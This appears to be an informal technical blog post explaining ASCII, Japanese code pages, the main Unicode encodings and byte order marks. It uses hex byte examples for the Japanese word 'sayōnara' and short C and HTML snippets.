             01000100 01111001 01101100 01101111 01101110

Computers, plain and simple as they are, store everything as numbers of course, and as such we need a way to map numbers to letters, and vice versa. This is of course the purpose of the ASCII table, which tells our computers to display a “B” instead of 66.

Since the 7-bit ASCII table has a maximum of 127 characters, any ASCII character can be represented using 7 bits (though they usually consume 8 bits now). This makes calculating, how long a string is for example, quite easy. In C programs for example, ASCII characters are represented using chars, which use 1 byte (=8 bits) of storage. Here is an example in C:


char author[] = “The Beatles”;
int authorLen = strlen(author);        // authorLen = 11
size_t authorSize = sizeof(author);    // authorSize = 12

The only reason the two variables are different, is because C automatically appends a 0x0 character at the end of a string (to indicate where it terminates), and as such the size will always one char(acter) longer than the length.

So, this is all fine and well if we only deal with “simple” languages like English. Once we try to represent a more complex language, Japanese for example, things start to get more challenging. The biggest problem is the sheer number of characters – there are simply more than 127 characters in the world’s written languages. ASCII was extended to 8-bit (primarily to accommodate European languages), but this still only scratches the surface when you consider Asian and Arabic languages.

Hence, a big problem with ASCII is that is essentially a fixed-length, 8-bit encoding, which makes it impossible to represent complex languages. This is where the Unicode standard comes in: It gives each character a unique code point (number), and includes variable-length encodings as well as 2-byte (or more) encodings.

But before we go to deep into Unicode, we’ll just blatantly pretend that Unicode doesn’t exist and think of a different way to store Japanese text. Yes! Let us enter a world where every language uses a different encoding! No matter what they want to make you believe – having countless encodings around is fun and exciting. Well, actually it’s not, but let’s take a look here why.

The ASCII characters end at 127, leaving another 127 characters for other languages. Even though I’m not a linguist, I know that there are more than 127 characters in the rest of the world. Additionally, many Asian languages have significantly more characters than 255 characters, making a multi-byte encoding (since you cannot represent every character with one byte) necessary.

This is where encodings come in (or better, “came” in before Unicode was established), which are basically like stencils. Let’s use Japanese for our code page example. I don’t speak Japanese unfortunately, but let’s take a look at this word, which means “Farewell” in Japanese (you are probably familiar with pronunciation – “sayōnara”):

さようなら

The ASCII table obviously has no representation for these characters, so we would need a new table. As it turns out, there are two main encodings for Japanese: Shift-JIS and EUC-JP. Yes, as if it’s not bad enough to have one encoding per language!

So code pages serve the same purpose as the ASCII table, they map numbers to letters. The problem with code pages – opposed to Unicode – is that both the author and the reader need to view the text in the same code page. Otherwise, the text will just be garbled. This is what “sayōunara” looks like in the aforementioned encodings:



EUC-JP

0xA4 B5 A4 E8 A4 A6 A4 CA A4 E9

Shift_JIS
0x82 B3 82 E6 82 A4 82 C8 82 E7

Their numerical representation between EUC-JP and Shift_JIS is, as is to be expected, completely different – so knowing the encoding is vital. If the encodings don’t match, then the text will be meaningless. And meaningless text is useless.

You can imagine that things can get out of hand when one party (party can be an Operating System, Email client, etc.) uses EUC-JP, and the other Shift_JIS for example. They both represent Japanese characters, but in a completely different way.

Encodings can either (to a certain degree) be auto-detected, or specified as some sort of meta information. Below is a HTML page with the same Japanese word, Shift_JIS encoded:


<HTML>
    <TITLE>Shift_JIS Encoded Page</TITLE>

    <META HTTP-EQUIV=”Content-Type” CONTENT=”text/html; charset=Shift_JIS”>
    <BODY>
            さようなら
    </BODY>
</HTML>

You can paste this into an editor, save it has a .html file, and then view it in your favorite browser. Try changing “Shift_JIS” to “EUC-JP”, fun things await you.

But I am getting carried away, after all this post is about Unicode, not encodings. So, Unicode solves these problems by giving every character from every language a unique code point. No more “Shift_JIS”, no more “EUC-JP” (not even to mention all the other encodings out there), just UNICODE.

Once a document is encoded in Unicode, specifying a code page is no longer necessary – as long as the client (reader) supports the particular Unicode encoding (e.g. UTF-8) the text is encoded with.

The five major Unicode encodings are:

UTF-8
UCS-2
UTF-16 (an extension of UCS-2)
UTF-32
UTF-7

All of these encodings are Unicode, and represent Unicode characters. That is, UTF-8 is just as capable as UTF-16 or UTF-32. The number in the encoding name represents the minimum number of bits that are required to store a single Unicode code point. As such, UTF-32 can potentially require 4 x as much storage as UTF-8 – depending on the text that is being encoded. I will be ignoring UTF-7 going forward, as its use is not recommended and it’s not widely used anymore.

The biggest difference between UTF-8 and UCS-2/UTF-16/UTF-32 is that UTF-8 is a variable length encoding, opposed to the others being fixed-length encodings. OK, that was a lie. UCS-2, the predecessor of UTF-16, is indeed a fixed length encoding, whereas UTF-16 is a variable length encoding. In most use cases however, UTF-16 uses 2 bytes and is essentially a fixed length encoding. UTF-32 on the other hand, and that is not a lie, is a fixed-length encoding that always uses 4 bytes to store a character.

Let’s look at this table which lists the 4 major encodings and some of their properties:

Encoding   Variable/Fixed   Min Bytes   Max Bytes
UTF-8 variable 1 4
UCS-2 fixed 2 2
UTF-16 variable 2 4
UTF-32 fixed 4 4



What this means, is that in order to represent a Unicode character (e.g. さ), a variable length encoding might require more than 1 byte, and in UTF-8’s case up to 4 bytes. UTF-8 needs potentially more bytes, since it maintains backward-compatibility with ASCII, and as such loses 7 bits.

Windows uses UTF-16 to store strings internally, as do most Unicode frameworks such as ICU and Qt‘s QString. Most Unixes on the other hand use UTF-8, and it’s also the most commonly found encoding on the web. Mac OSX is a bit of a different beast; due to it using a BSD kernel, all BSD system functions use UTF-8, whereas Apple’s Cocoa framework uses UTF-16.

UCS-2 or UTF-16
I had already mentioned that UTF-16 is an extension of UCS-2, so how does it extend it and why does it extend it?

You see, Unicode is so comprehensive now that it encompasses more than what you can store in 2 bytes. All characters (code points) from 0x0000 to 0xFFFF are in the “BMP“, the “Basic Multilingual Plane”. This is the plane that uses most of the character assignments, but additional planes exist, and here is a list of all planes:

•    The “BMP”, “Basic Multilingual Plane”, 0x0000 -> 0xFFFF
•    The “SMP”, “Supplementary Multilingual Plane”, 0x10000 -> 0x1FFFF
•    The “SIP”, “Supplementary Ideographic Plane”, 0x20000 -> 0x2FFFF
•    The “SSP”, “Supplementary Special-purpose Plane”, 0xE0000 -> 0xEFFFF

So technically, having 2 bytes available is not even enough anymore to cover all the available code points, you can only cover the BMP. And this is the main difference between UCS-2 and UTF-16, UCS-2 only supports code points in the BMP, whereas UTF-16 supports code points in the supplementary planes as well, through something called “surrogate pairs“.

Representation in Unicode
So let’s look at the above sample text in Unicode, shall we? Sayonara Shift_JIS & EUC-JP! The site http://rishida.net/tools/conversion/ has some great online tools for Unicode, one of which is called “Uniview“. It shows us the actual Unicode code points, the symbol itself and the official description:

eventlogblog_unicode_uniview.pngThe official Unicode notation (U+hex) for the above characters uses the U+ syntax, so for the above letters we would write:


U+3055 U+3088 U+3046 U+306A U+3089

With this information, we can now apply one of the UTF encodings to see the difference:


UTF-8

E3 81 95 E3 82 88 E3 81 86 E3 81 AA E3 82 89

UTF-16
30 55 30 88 30 46 30 6A 30 89

UTF-32
00 00 30 55 00 00 30 88 00 00 30 46 00 00 30 6A 00 00 30 89

So UTF-8 uses 5 more bytes than UCS-2/UTF-16 to represent the same exact characters. Remember that UCS-2 and UTF-16 would be identical for this text since all characters are in the BMP. UTF-32 uses yet 5 more bytes then UTF-8 and would be require the most storage space, as to be expected.

What you can also see here, is that UTF-16 essentially mirrors the U+ notation.

Fixed Length or Variable Length?
Both encoding types have their advantages and disadvantages, and I will be comparing the most popular UTF encodings, UTF-8 and UCS-2, here:

Variable Length UTF-8:
•    ASCII-compatible
•    Uses potentially less space, especially when storing ASCII
•    String analysis/manipulation (e.g. length calculation) is more CPU-intensive

Fixed Length UCS-2:
•    Potentially wastes space, since it always uses fixed amount of storage
•    String analysis/manipulation is usually less CPU intensive

Which encoding to use will depend on the application. If you are creating a web site, then you should probably choose UTF-8. If you are storing data in a database however, then it will depend on the type of strings that will be stored. For example, if you are only storing languages that cannot be represented through ASCII, then it is probably better to use UCS-2. If you are storing both ASCII and languages that require Unicode, then UTF-8 is probably a better choice. An extreme example would be storing English-Only text in a UCS-2 database – it would essentially use twice as much storage as an ASCII version, without any tangible benefits.

One of the strongest suits of UTF-8, at least in my opinion, is its backward compatibility with ASCII. UTF-8 doesn’t use any numbers below 127 (0x7F), which are – well – reserved for ASCII characters. This means that all ASCII text is automatically UTF-8 compatible, since any UTF-8 parser will automatically recognized those characters as being ASCII and render them appropriately.

The BOM
And this brings us to the next topic – the BOM (header). BOM stands for “Byte Order Mark”, and is usually a 2-4 byte long header in the beginning of a Unicode text stream, e.g. a text file. If a text editor does not recognize a BOM header, then it will usually display the BOM header as either the þÿ or ÿþ characters.

The purpose of the BOM header is to describe the Unicode encoding, including the endianess, of the document. Note that a BOM is usually not used for UTF-8.

Let’s revisit the example from earlier, the UTF-16 encoding looked like this:


30 55 30 88 30 46 30 6A 30 89

If we wanted to store this text in a file, including a BOM header, then it could look also look like this:


FF FE 55 30 88 30 46 30 6A 30 89 30

“FF FE” is the BOM header, and in this case indicates that a UTF-16 Little Endian encoding is used. The same text in UTF-16 Big Endian would look like this:


FE FF 30 55 30 88 30 46 30 6A 30 89

The BOM header is generally only useful when Unicode encoded documents are being exchanged between systems that use different Unicode encodings, but given the extremely little overhead it certainly doesn’t hurt to add it to any UTF-16 encoded document. As such, Windows always adds a 2-byte BOM header to all Unicode text documents. It is the responsibility of the text reader (e.g. an editor) to interpret the BOM header correctly. Linux on the other hand, being a UTF-8 fan and all, does not need to (and does not) use a BOM header – at least not by default.

Tools & Resources
There are a variety of resources and tools available to help with Unicode authoring, conversions, and so forth.

I personally like Ultraedit, which lets me convert documents to and from UTF-8 and UTF-16, and also supports the BOM headers. GEdit on Linux is also very capable, and supports different code pages (if you ever need to use those) as well. Babelpad is an editor designed specifically for Unicode, and seems to support every possible encoding. I have not actually used this editor though.

A nifty online converter that I already mentioned earlier can be found at http://rishida.net/tools/conversion/, and also check out UniView: http://rishida.net/scripts/uniview/.

The official Unicode website is of course a great resource too, though potentially overwhelming to mere mortals that only have to deal with Unicode occasionally. The best place to start is probably their basic FAQ: http://www.unicode.org/faq/basic_q.html.

I hope this provides some clarification for those who know that Unicode exists, but are not entirely comfortable with the details.

さようなら!